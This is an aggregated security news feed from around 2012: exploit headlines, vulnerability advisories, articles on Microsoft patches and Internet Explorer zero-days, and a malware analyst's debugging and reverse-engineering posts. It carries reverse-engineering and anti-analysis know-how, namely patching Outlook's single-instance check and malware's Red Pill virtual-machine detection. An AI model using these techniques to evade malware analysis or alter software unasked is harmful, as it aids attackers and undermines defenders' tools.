==> local - Microsoft Office Excel ReadAV Arbitrary Code Execution

http://www.1337day.com/rss

==> remote - MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability

http://www.1337day.com/rss

==> dos / - Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service

http://www.1337day.com/rss

==> Application vulnerability disclosures rise, Microsoft finds

http://feeds.pheedo.com/tt/1323 The Black Hole attack toolkit is fueling many of the exploits targeting the vulnerabilities, according to Microsoft.

==> Microsoft addresses critical Word flaws, new RSA key length

http://feeds.pheedo.com/tt/1323 The new requirements for digital certificates kick in with the October update, which includes one critical bulletin and six important bulletins.

==> Microsoft issues emergency security update for Internet Explorer

http://feeds.pheedo.com/tt/1323 Microsoft issued an out-of-band security bulletin, addressing a zero-day vulnerability and four other flaws in Internet Explorer.

==> Microsoft to issue emergency Internet Explorer update Friday

http://feeds.pheedo.com/tt/1323 A temporary automated fix plugging the dangerous flaw is available until an official patch is released.

==> ZDI-CAN-1586: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1574: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1514: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1373: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1515: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2012-07-16, 74 days ago. The vendor is given until 2013-01-12 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1526: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1525: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1524: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1523: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1520: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1402: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2011-11-29, 304 days ago. The vendor is given until 2012-05-27 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1281: Microsoft

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2011-05-25, 492 days ago. The vendor is given until 2011-11-21 to publish a fix or workaround. Once the vendor has created and tested a

==> Kaspersky Lab announces a brand-new OS focused on security

http://feeds.pcworld.com/pcworld/blogs/security_alert/ The past two years or so have brought a new breed of scary malware to the forefront of public attention, including the infamous Stuxnet worm that was discovered back in 2010. Following hard on Stuxnet's proverbial heels, of course, were Duqu, Flame, Gauss, Shamoon, and Wiper, to name just a few examples. These new threats are generally thought to be state-sponsored in many cases and developed for cyberespionage against specific targets; another factor in common is that they tend to work through Microsoft Windows. It's long been known that Linux offers numerous security advantages over both Windows and Macs, of course, but security research firm Kaspersky Lab--which played a key role in identifying many of these frightening pieces of malware--apparently has other ideas. Specifically, the company announced on Tuesday that it's developing, from scratch, a brand-new, security-focused operating system of its own.

'Relegated to second place'

"We're developing a secure operating system for protecting key information systems (industrial control systems (ICS)) used in industry/infrastructure," wrote Eugene Kaspersky, chairman and CEO of Kaspersky Lab, in a blog post on Tuesday. Whereas typical corporate settings tend to place a high priority on security and the confidentiality of data, Kaspersky explained, industrial settings such as nuclear power stations and transportation control facilities tend to have a different focus. Namely, the highest priority for them is "maintaining constant operation come bleep or high water," he wrote. "Uninterrupted continuity of production is of paramount importance at any industrial object in the world; security is relegated to second place." Software updates also tend to be skipped in such settings for similar reasons, Kaspersky added.

Written from scratch

In an ideal world, all ICS software would be rewritten to reflect today's new breed of malware and to incorporate all the latest security technologies available, Kaspersky pointed out. Of course, even with the vast cost and effort required, such a solution would "still not guarantee sufficiently stable operation of systems," he added. Accordingly, Kaspersky's goal is to build a secure operating system onto which ICS can be installed and which could be built into the existing infrastructure, "controlling 'healthy' existing systems and guaranteeing the receipt of reliable data reports on the systems' operation." Kaspersky's new OS will be narrowly focused, he noted, as well as unable to execute any third-party code. It will not be based on any existing code, but rather will be written entirely from scratch. Few other specifics were offered in his description, and Kaspersky noted that security through obscurity--keeping at least some of the details secret--is part of the company's long-term plan.

An ambitious plan

It is, of course, difficult to assess such a plan before anything is revealed and on the basis of so few specifics. Still, given the growing number of corporations and governments embracing Linux for its superior security--the U.S. Department of Defense, the U.S. Navy, and the U.S. Air Force being just a few recent examples--it's a little difficult to imagine that a single organization, with a necessarily limited set of resources, could surpass the efforts of the global community of Linux developers who have created the hugely successful open source operating system. In any case, even for those of us who don't work with industrial control systems, it seems to me the message here is pretty clear: If you need full security, you need something other than Windows.

==> Microsoft plans patch for critical flaw in Word next Tuesday

http://feeds.pcworld.com/pcworld/blogs/security_alert/ It's the first Thursday of October. Do you know what happens on the first Thursday of each month? Microsoft provides an advance notification of the security bulletins it plans to release on the second Tuesday of the month, more commonly known as Patch Tuesday. Following an unusually light Patch Tuesday in September, Microsoft was forced to deal with the specter of a zero-day exploit being used in the wild to attack Internet Explorer. Microsoft responded with an out-of-band patch reflecting the urgent nature of the threat. IT admins will be a little busier in October. According to the Microsoft Security Bulletin Advance Notification for October 2012, Microsoft has a total of seven new security bulletins slated for release next week. Six of the seven are rated merely as Important, while the seventh, a patch for a flaw affecting all supported versions of Microsoft Word, is rated as Critical for Word 2010. Microsoft plans to release seven security bulletins next Tuesday. Andrew Storms, director of security operations for nCircle, stresses the urgency of the patch for Microsoft Word. "The bulletin that looks most serious is a rare Microsoft Word update tagged as critical for the brand new Word 2010, but downgraded to important in Word 2003. I can't remember the last time we saw a critical bug that affected all versions of Word. It makes me remember the bad old days when Word was a nearly constant source of security problems for businesses." Marcus Carey, a security researcher with Rapid7, points out that the vulnerability can be triggered by opening, or even previewing, a malicious file. "This vulnerability could result in the complete compromise of a system if exploited. Since this is an Office vulnerability this may affect both Windows and Macintosh users." Some bulletins, like Bulletin 7, indicate a potentially alarming fact.
The bulletin impacts versions of SQL Server going back to 2000, and indicates a flaw in code that has been reused for more than a decade. According to Alex Horan, a senior product manager with CORE Security, "When you look at the number of versions that are affected you quickly come to the determination that these vulnerabilities have existed for quite a long period of time and have potentially been abused without user knowledge throughout several generations of the software." nCircle's Storms also noted that Microsoft is issuing one final reminder that changes are imminent for acceptable key lengths for RSA keys. "If you haven't already fixed this, time is running out. If your key lengths are too short your Microsoft applications will stop working, so it might be worth your time to review this one more time." Tune in next Tuesday for more details when the Patch Tuesday security bulletins are officially released.

==> Microsoft pushes out critical security updates for Internet Explorer

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Microsoft has published an out-of-band security bulletin, MS12-063, to address a vulnerability that is being actively exploited in attacks in the wild. In addition, Microsoft also released an update to resolve a critical flaw in Adobe Flash in Internet Explorer 10, which is the default browser in Windows 8 and Windows Server 2012. Microsoft has responded quickly in its investigation of reports that a zero-day vulnerability in Internet Explorer is being actively exploited. Microsoft issued a security advisory with workarounds and mitigating factors to help customers guard against attacks pending a fix. Then, it released a one-click Fix-It tool to protect customers while kicking its developers into high gear to create a more permanent fix. Microsoft squashes some bugs in Internet Explorer with new patches released today. Andrew Storms, director of security operations for nCircle, praised Microsoft's quick turnaround, but he also feels there is more on the line than just protecting customers from attacks. "Microsoft had to respond very quickly to this bug. In addition to the serious security threats it posed to their customers, Internet Explorer's market share is at risk. Many security pundits and organizations have been telling users to switch browsers until a patch is available. I'm sure that got the attention of a lot of Microsoft executives." To Microsoft's credit, this is the first zero-day to hit Internet Explorer in nearly two years. It seems like it was once a much more common occurrence, and that once upon a time Microsoft wasn't this good at cranking out the fix. Microsoft has come a long way in improving its own response to identified security issues, and in setting the bar for other software vendors to strive for. Separate from the MS12-063 patch, which applies to Internet Explorer 7, 8, and 9, Microsoft also addressed a critical security issue in Internet Explorer 10.
There are updates available for both 32-bit and 64-bit Windows 8, and for Windows Server 2012, to fix issues in the Adobe Flash code embedded in Internet Explorer 10. In previous versions of Internet Explorer, Adobe Flash is treated as a separate, standalone application. That software is updated by Adobe, and the patch is traditionally applied outside of the Windows Update or Microsoft Patch Tuesday processes. However, because Flash is now embedded in Internet Explorer 10, the burden falls on Microsoft to develop and release the appropriate patch. If you have Automatic Updates enabled, you don't need to do anything. However, if you don't have Automatic Updates enabled, you should download and apply these updates as soon as possible.

==> What you need to know about the Internet Explorer zero-day attacks

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Microsoft has confirmed reports that a zero-day vulnerability in its Internet Explorer Web browser is being actively attacked in the wild. While Microsoft works diligently to crank out a patch, it's important for businesses and consumers to understand the threat, and the steps that can be taken to avoid compromise while you wait. Microsoft has published a security advisory acknowledging the threat. According to Microsoft, the zero-day exploit affects Internet Explorer 7, 8, and 9. Internet Explorer 10 is not impacted, but it's not completely safe because it remains vulnerable to flaws in the embedded Adobe Flash. The Microsoft advisory includes some tips that can be used to defend against this threat pending a patch for the underlying flaw. Microsoft recommends that customers use the Enhanced Mitigation Experience Toolkit (EMET) to implement mitigations that can prevent the zero-day exploit from working. In addition, Microsoft advises customers to set the Internet and local intranet security zones in Internet Explorer to High to block ActiveX controls and Active Scripting from running, or at least configure them to prompt before executing. Andrew Storms, director of security operations for nCircle, puts the threat in perspective. "If your systems are running IE, you are at risk, but don't panic. The reality is it's just one more zero-day and we've seen an awful lot of them come and go." However, Storms isn't confident that business customers will appreciate the guidance from Microsoft. "If you set your Internet and local security zones to High as recommended to block ActiveX controls and Active Scripting, there's a very good chance necessary business applications will be adversely affected." The Metasploit exploit for the Internet Explorer zero-day relies on the presence of Java on the target system.
That means that PCs without Java are safe against the Metasploit-based exploits, and that it might be a great time to reevaluate whether your PCs really need to run Java. If you don't actually use Java, uninstall it. Liam O Murchu, manager of operations for Symantec Security Response, adds some interesting trivia. "Another interesting point to note regarding this vulnerability is that the exploit was found on the same servers being used as part of the Nitro attacks. In August, Symantec observed that the cybercriminals behind this ongoing targeted attack campaign, which initially targeted companies in the chemical industry, had ramped up their efforts with several new techniques and a Java zero-day vulnerability." Essentially, if you can remove Java you should do so. Regardless of Java, though, businesses and consumers alike should always be vigilant about ActiveX controls or Active Scripting executing within the browser and take steps to guard against malicious code. The next routine Patch Tuesday isn't scheduled until October 9. It seems reasonable to assume Microsoft will release an out-of-band patch for this flaw before then.

==> Operating System Choice Does Not Equal Security

http://hellnbak.wordpress.com/feed/ Yesterday while some of us in the USA were enjoying a day off, Google made the news with this article in the Financial Times stating that they are moving away from Microsoft Windows due to security concerns. My first reaction was to question why a company with as many smart brains as Google would make such [...]

==> Interesting Information Security Bits for 11/03/2008

http://infosecramblings.wordpress.com/feed/ Good afternoon everybody! I hope your day is going well. Here are today’s Interesting Information Security Bits from around the web. Microsoft: Trojans are huge and China is tops in browser exploits | Latest Security News – CNET News An interesting report has been put out by Microsoft that is worth a gander. Google patches [...]

==> Cross Your T's and Dot Your Filenames

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was developing some automation code recently and found that a process that I was injecting code into was crashing. At first I thought it was an error in my injected code, but when I looked at the crash dump, I was amazed to see that the issue was in MFC42.DLL:

    MOV EBX,104
    PUSH EBX
    LEA EAX,DWORD PTR SS:[EBP+szBuffer]
    PUSH EAX
    PUSH DWORD PTR DS:[ESI+6C]
    CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA>]
    LEA EAX,DWORD PTR SS:[EBP+szBuffer]
    PUSH 2E
    PUSH EAX
    CALL DWORD PTR DS:[<&msvcrt._mbsrchr>]
    POP ECX
    POP ECX
    MOV DWORD PTR SS:[EBP-80],EAX
    MOV BYTE PTR DS:[EAX],0          <-- Crash!

The code above is from MFC42.DLL, version 6.2.4131.0 from Windows XP SP2. It effectively does the following:

    GetModuleFileName(NULL, szBuffer, MAX_PATH);
    *(_mbsrchr(szBuffer, '.')) = 0;

The function _mbsrchr(...) returns NULL if the character searched for is not found. This means that if there is no '.' in the current process's filename (which was the case for the file I was testing), then the second C line above will try to write the byte 0x00 to address 0x00000000, which will cause a crash. I figured that this was some obscure function from MFC42.DLL that most applications don't make use of; however, after a little digging it turns out that this code is in CWinApp::SetCurrentHandles(), which is called by AfxWinInit(...). From http://msdn2.microsoft.com/en-us/library/w04bs753(vs.80).aspx: "[AfxWinInit] is called by the MFC-supplied WinMain function, as part of the CWinApp initialization of a GUI-based application, to initialize MFC." In other words, almost every MFC GUI program executes the code snippet above! As surprised as I was by this, I figured that surely this had been fixed for Vista. Believe it or not, the same issue exists!
Below is the code from MFC42.DLL version 6.6.8063.0 from Windows Vista Gold:

    PUSH 104
    LEA EDX,DWORD PTR SS:[EBP+szBuffer]
    MOV [EDI+0C],ECX
    MOV EAX,DWORD PTR DS:[ESI+6C]
    PUSH EDX
    PUSH EAX
    CALL DWORD PTR DS:[<&KERNEL32.GetModuleFileNameA>]
    TEST EAX,EAX
    JZ LOC_722F1484
    CMP EAX,104
    JZ LOC_722F1484
    LEA ECX,[EBP+szBuffer]
    PUSH 2E
    PUSH ECX
    CALL __mbsrchr
    MOV EBX,EAX
    ADD ESP,8
    TEST EBX,EBX
    MOV [EBP+VAR_310],EBX
    JZ LOC_7230DB7D
    ...

    __mbsrchr:
    MOV EDI,EDI
    PUSH EBP
    MOV EBP,ESP
    POP EBP
    JMP DWORD PTR DS:[<&msvcrt._mbsrchr>]

    LOC_7230DB7D:
    ...
    JMP DWORD PTR DS:[<&msvcrt.CxxThrowException>]

While the code above checks for the lack of a '.' in the filename, it still throws an exception and causes a crash if there's no '.'. The good news is that it doesn't seem easy to accidentally execute an executable file without a '.' in the filename in Vista:

    C:\>copy c:\windows\notepad.exe notepad_exe
            1 file(s) copied.

    C:\>notepad_exe
    'notepad_exe' is not recognized as an internal or external command,
    operable program or batch file.

    C:\>start notepad_exe
    [This opens the "Open With" dialog box in Explorer instead of executing the file.]

However, it is still possible to run non-dotted files via API functions like CreateProcess(...) to cause the crash described above.
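The defensive fix that both MFC42 versions miss is to treat "no '.' found" as a normal outcome rather than as something to dereference or to throw on. The following C program is an added example written for this page; it is not code from the post or from MFC. It shows a hardened version of the extension-stripping step in portable C (strrchr in place of _mbsrchr, no Windows headers), and goes one step further than the MFC snippet by searching only the final path component, so that a '.' inside a directory name is never mistaken for an extension. The sample paths, including the dotless notepad_exe case from the post, are constructed for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Hardened equivalent of MFC42's "strip the extension from the module path"
 * step (added example, not MFC code). Modifies path in place, as the MFC
 * code intended. Returns 1 if an extension was removed, 0 if there was none.
 * Accepts both '\\' and '/' as separators so it runs unchanged on any OS. */
int strip_extension(char *path)
{
    /* Restrict the search to the last path component: "C:\app.d\tool" has
     * a '.' in a directory name but no extension on the file itself. */
    char *sep1 = strrchr(path, '\\');
    char *sep2 = strrchr(path, '/');
    char *name = path;
    if (sep1 && (!sep2 || sep1 > sep2))
        name = sep1 + 1;
    else if (sep2)
        name = sep2 + 1;

    char *dot = strrchr(name, '.');
    /* The check MFC42 6.2 lacked and MFC42 6.6 turned into an exception:
     * strrchr/_mbsrchr return NULL when the character is absent, and writing
     * through NULL is the crash. A leading '.' is the whole file name
     * (dot == name), not an extension, so it is left alone too. */
    if (dot == NULL || dot == name)
        return 0;

    *dot = '\0';
    return 1;
}

/* Strips a copy of path into out (capacity n) so the caller's string is
 * left intact. Returns strip_extension's result, or -1 if path does not
 * fit, rather than silently truncating the way a fixed MAX_PATH copy would. */
int strip_extension_copy(const char *path, char *out, size_t n)
{
    size_t len = strlen(path);
    if (len + 1 > n)
        return -1;
    memcpy(out, path, len + 1);
    return strip_extension(out);
}

/* Returns 1 if stripping path yields exactly expected, 0 otherwise. */
int strips_to(const char *path, const char *expected)
{
    char buf[260];
    if (strip_extension_copy(path, buf, sizeof buf) < 0)
        return 0;
    return strcmp(buf, expected) == 0;
}

int main(void)
{
    /* Constructed sample paths, including the dotless case from the post. */
    const char *samples[] = {
        "C:\\Windows\\notepad.exe",
        "C:\\Windows\\notepad_exe",
        "C:\\app.d\\tool",
        "/usr/local/bin/.hidden",
    };
    char buf[260];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int rc = strip_extension_copy(samples[i], buf, sizeof buf);
        printf("%-28s -> %-28s (stripped=%d)\n", samples[i], buf, rc);
    }
    return 0;
}
```

The point for reviewers of similar code is that the search function's NULL return is part of its contract, not an error: a process launched via CreateProcess(...) with a dotless image name is a legitimate input, and a library that every MFC GUI program runs at start-up should handle it by returning a status, as strip_extension does, instead of faulting or throwing.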

==> Refreshing the Taskbar Notification Area

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I am working on an automation system that involves forcefully terminating a process that creates an icon in the Taskbar Notification Area (no, not the "system tray"). It is the responsibility of the process that creates an icon in the Taskbar Notification Area to remove the icon when the process exits; however, since I am using TerminateProcess(...) to remotely kill the process, the code to remove the icon never gets executed. As such, the icon remains in the Taskbar Notification Area until one moves the mouse cursor over the icon, at which point it disappears. Since this is an automation system that's being developed, this icon-creating process will get executed many times, and if left unchecked would end up leaving hundreds of icons in the Taskbar Notification Area (one icon per execution). That's bad. Despite my best Googling efforts ("refresh notification area", "redraw system tray", etc.), I wasn't able to find elegant code to solve this problem. I found some novel solutions, though. The most common suggestion was to use SetCursor(...) to drag the mouse cursor around the Taskbar Notification Area; while this works, it's an ugly hack and is actually quite slow. One of my "favorite" suggestions was to try to associate each icon in the Taskbar Notification Area with a process, then monitor each process for termination, then delete the icon once the given process terminates (talk about overkill... geeze). When a user moves the mouse over a "dead icon" in the Taskbar Notification Area, some window message must get sent to the window to cause it to say to itself, "hey, the mouse is over me, so let me see if the process that created this icon is still alive.... Oh, it's not? Let me remove the icon, then." I wanted to find what window message was causing that code to fire so that I could send that message to the window myself.
I started up Microsoft Spy++ and saw the following information for the Taskbar Notification Area and its parent windows:

A useful feature of Microsoft Spy++ is that it allows you to monitor window messages sent to a given window. I started monitoring the window messages getting sent to the "Notification Area" window without moving my mouse over the window and saw the following messages getting sent:

    * TB_BUTTONCOUNT
    * TB_GETBUTTONINFOW
    * TB_SETBUTTONINFOW
    * WM_PAINT
    * WM_ERASEBKGND

The messages above clearly had nothing to do with me moving my mouse (since I wasn't moving my mouse over the window), so I configured Microsoft Spy++ to filter out those messages. Then I moved my mouse over the "dead icon" in question and saw the following messages:

    <00001> 00010056 S WM_NCHITTEST xPos:1491 yPos:1024
    <00002> 00010056 R WM_NCHITTEST nHittest:HTCLIENT
    <00003> 00010056 S WM_SETCURSOR hwnd:00010056 nHittest:HTCLIENT wMouseMsg:WM_MOUSEMOVE
    <00004> 00010056 R WM_SETCURSOR fHaltProcessing:False
    <00005> 00010056 P WM_MOUSEMOVE fwKeys:0000 xPos:5 yPos:0
    <00006> 00010056 S TB_HITTEST pptHitTest:022BFC18
    <00007> 00010056 R TB_HITTEST iIndex:0
    <00008> 00010056 S TB_DELETEBUTTON iButton:0
    <00009> 00010056 R TB_DELETEBUTTON fSucceeded:True

Aha! So either WM_NCHITTEST, WM_SETCURSOR, WM_MOUSEMOVE, or TB_HITTEST leads to TB_DELETEBUTTON getting sent. After trying to send each window message manually with SendMessage(...), I found which window message was the catalyst: WM_MOUSEMOVE.
With this new-found knowledge, I was able to whip up the following code to refresh the Taskbar Notification Area:

    // Find a direct child of x with window class y (and an empty title).
    #define FW(x,y) FindWindowEx(x, NULL, y, L"")

    void RefreshTaskbarNotificationArea()
    {
        HWND hNotificationArea;
        RECT r;

        // Walk Shell_TrayWnd -> TrayNotifyWnd -> SysPager -> the
        // "Notification Area" toolbar that holds the icons.
        hNotificationArea = FindWindowEx(
            FW(FW(FW(NULL, L"Shell_TrayWnd"), L"TrayNotifyWnd"), L"SysPager"),
            NULL,
            L"ToolbarWindow32",
            L"Notification Area");
        if (hNotificationArea == NULL)
            return;     // no notification area found (e.g. Explorer not running)

        GetClientRect(hNotificationArea, &r);

        // Synthesize WM_MOUSEMOVE over the whole toolbar in 5-pixel steps; the
        // toolbar removes any icon whose owning process has gone away.
        for (LONG x = 0; x < r.right; x += 5)
            for (LONG y = 0; y < r.bottom; y += 5)
                SendMessage(
                    hNotificationArea,
                    WM_MOUSEMOVE,
                    0,
                    (y << 16) + x);     // same as MAKELPARAM(x, y)
    }

==> Stateless Bi-Directional Proxy

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx After submitting my first patent two years ago to the US Patent Office, it has finally been published online! You can read all the juicy details here and you can see diagrams here if you have a TIFF-renderer browser plug-in. This patent was from when I was still on the Firewall team at Microsoft, so it's network-related. The other patents of mine that should get published on the web over the next two years are from when I was on the Anti-Malware team at Microsoft, so they're related to binary analysis... in other words, even cooler than this one ;)

==> Investigating Outlook's Single-Instance Restriction (PART 1)

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx If you use Outlook and have multiple e-mail account profiles, you know how frustrating it is to have Outlook restrict you to a single running instance of Outlook per interactive login. For those of you not familiar with this "feature", here's the scoop: if you have one instance of Outlook running and then launch another instance, a new Outlook window is created in the context of the original instance, but you don't have the option to load another e-mail account profile. This is a pain because it requires you to close and restart Outlook each time you want to check a different e-mail account (assuming you have a separate profile for each account). Tim Mullen, a colleague of mine, had the ingenious idea of using RunAs to launch the second Outlook process as another user, to try to circumvent whatever "feature" was restricting Outlook to a single instance. "What a great idea!" I thought, and I kicked myself for not having thought of that myself! But when we tested it out, it had the same results as running a second instance of Outlook without RunAs; an extra window popped up for the first instance and we weren't given the option to load another profile. This piqued my interest and I wondered how Outlook was determining whether or not another instance was already running in the interactive login session. Typically when I'm trying to figure out how specific functionality works, I have an API function or string to use as my guide. For example, if I'm red-teaming a DRM solution and I get a message box saying, "Invalid license key." then I can search in the binary for that string to see what code references it, or I can set a breakpoint on the Windows API functions that display message boxes. However, for the case of Outlook here, I didn't have any strings to base my investigation on, and I didn't know which API function(s) were being used to check for the first instance. 
My first idea was to use an API logging tool like AutoDebug and run it once on the first Outlook session and once on the second Outlook session. I could then compare the API call logs and see where they differed, and then begin to investigate what caused them to differ at that point. However, I quickly found that API loggers such as AutoDebug are not suited for such a heavyweight program as Outlook (which imports a few thousand DLLs and a few million API functions (yes, I'm exaggerating, but it's still a lot)). My second idea was to use a conditional-branch logger, such as http://www.woodmann.com/ollystuph/Conditional_Branch_Logger_v1.0.zip, and run the same comparison as described above. However, I didn't have that plugin downloaded at the time and I didn't have Internet access, so I had to make do with what was already on my laptop. I used Process Explorer to watch what happens when the second instance of Outlook is launched. Sure enough, the process starts and then terminates. So I used OllyDbg to set a breakpoint on ExitProcess(...) to see if I could get a decent call stack to see what code in Outlook led to the ExitProcess(...) call. The good news is that this allowed me to find the code that led to the process termination. The bad news is that it was called via _cexit(...) from ___tmainCRTStartup(...), so whatever code was detecting the first instance of Outlook was bailing out via rets, not via a direct call to _cexit(...) or ExitProcess(...). This led me to the old trustworthy Trial-and-Error-with-F8 method. The idea is simple -- starting from the process's Entry Point, step over (F8 in OllyDbg) every function call until you see the desired results, at which point you know the code in question lies within that function call. For this case, I was watching for a new window to pop up in the context of the first Outlook instance; by that time the check would already have been made to see if another instance of Outlook was running.
The great thing about this approach is that it's incredibly straightforward. The downside is that if you're looking for functionality that doesn't happen near the beginning of the process execution, it can be very time consuming. Luckily though, this method worked like a charm for Outlook! I started the second Outlook process in OllyDbg, stepped over the first call and into a jump. No windows popped up yet, so I hadn't yet stepped over the call in question. I kept pressing F8 until I found that when I tried stepping over the call from address 0x2FD251C8 (this of course is specific to my computer; your addresses will differ), an Outlook window popped up in the context of the first Outlook process. So I set a breakpoint on 0x2FD251C8 and restarted my second Outlook process, this time stepping in (F7) to that call and pressing F8 again until I found the next call that opened the first Outlook window. I found that stepping over the call at address 0x2FD25228 caused the window to pop up, so I set a breakpoint on that address, restarted, stepped in, and continued this process for about two minutes until I found the following code:

    .text:30006BB7 push    offset WindowName     ; "Microsoft Outlook"
    .text:30006BBC push    offset aMspim_wnd32   ; "mspim_wnd32"
    .text:30006BC1 mov     [ebp+var_42C], edi
    .text:30006BC7 call    ds:FindWindowA

This looks like the culprit! During Outlook's initialization, it checks to see if a window named "Microsoft Outlook" with class name "mspim_wnd32" exists, and if so, it assumes that another instance is already running. To test this, I set the return value of FindWindowA(...) from the call above to NULL, and Outlook opened a full second instance of itself in a separate process, and allowed me to use a different account profile. This is a great example of where a very straightforward reverse-engineering approach (Trial-and-Error-with-F8) can yield excellent results in just a few minutes given the right conditions.
As a disclaimer, I don't know the reason that the Outlook development team decided to restrict Outlook to a single instance. Perhaps multiple instances will cause massive data corruption. In other words, if you're going to patch your Outlook executable so that it does allow for multiple instances, do so at your own risk! This post continued in Part 2.

==> Career Shift

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx Friday, April 20th will be my final day at Microsoft. I will be joining NGS in the coming weeks as a Principal Security Consultant. I've copied all of my old blog posts from http://blogs.msdn.com to http://www.malwareanalysis.com though unfortunately I was not able to save the old comments. My new personal e-mail address is jasonATmalwareanalysisDOTcom.

==> When the Red Pill is Hard to Swallow

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I was looking at a malware sample last week that used a variation of Joanna Rutkowska's infamous Red Pill (http://invisiblethings.org/papers/redpill.html) to determine whether or not the malware was being run from inside a Virtual Machine. Based on the Red Pill concept, the guest OS's IDTR should be different from the host OS's IDTR. I was using Virtual PC to step through the malware sample in OllyDbg, with the goal of skipping the conditional jump after SIDT that led to the detection of my VM (see http://download.intel.com/design/Pentium4/manuals/25366720.pdf#page=275 for details on the SIDT instruction). You can imagine my surprise when SIDT returned 0x8003F400 as the base address of the IDT, which is the same as the base address of the IDT on my host Windows XP system! My first thought was that maybe the Virtual PC team figured out some ingenious way to make this happen via the Virtual Machine Additions add-on (see http://www.microsoft.com/technet/prodtechnol/virtualserver/2005/proddocs/vs_tr_components_additions.mspx?mfr=true). So I uninstalled Virtual Machine Additions, rebooted, and tried again. To my continued surprise, OllyDbg was still showing the host OS's IDTR when stepping through the SIDT instruction on my guest OS. After some more thinking, I thought, "maybe it has something to do with the fact that I'm single-stepping through SIDT in OllyDbg." To test this hypothesis, I set a breakpoint after the SIDT instruction, and ran the program from the start. Sure enough, SIDT returned 0xF9CB6440 as the base address of the IDT that time. The whole trick behind the Red Pill is that VMs don't typically have the opportunity to intercept SIDT since it's not a privileged instruction.
However, when the Trap Flag is set (due to single-stepping), Virtual PC intercepts the int 1 interrupt and can execute the current instruction however it pleases; when it has the opportunity, it will use the host's IDTR for the SIDT instruction. Hopefully this knowledge will make the Red Pill a little easier for you to swallow (or spit-out if the Trap Flag is set).

==> Terms of the Trade

